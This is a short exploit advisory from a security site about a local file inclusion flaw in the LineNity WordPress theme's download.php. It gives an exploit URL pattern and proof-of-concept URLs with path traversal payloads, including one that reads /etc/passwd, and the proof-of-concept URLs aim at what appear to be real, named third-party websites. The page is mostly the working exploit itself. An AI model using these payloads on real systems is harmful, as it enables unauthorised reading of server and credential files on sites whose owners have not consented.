WordPress LineNity Local File Inclusion

2014.04.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

[+] Local File Inclusion in WordPress Theme LineNity [+] Date: 13/04/2014 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803 [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vulnerable File: download.php [+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ] [+] PoC: http://www.mom-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php http://sport.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd http://loketpln.us.st//wp-content/themes/linenity/functions/download.php?imgurl=download.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top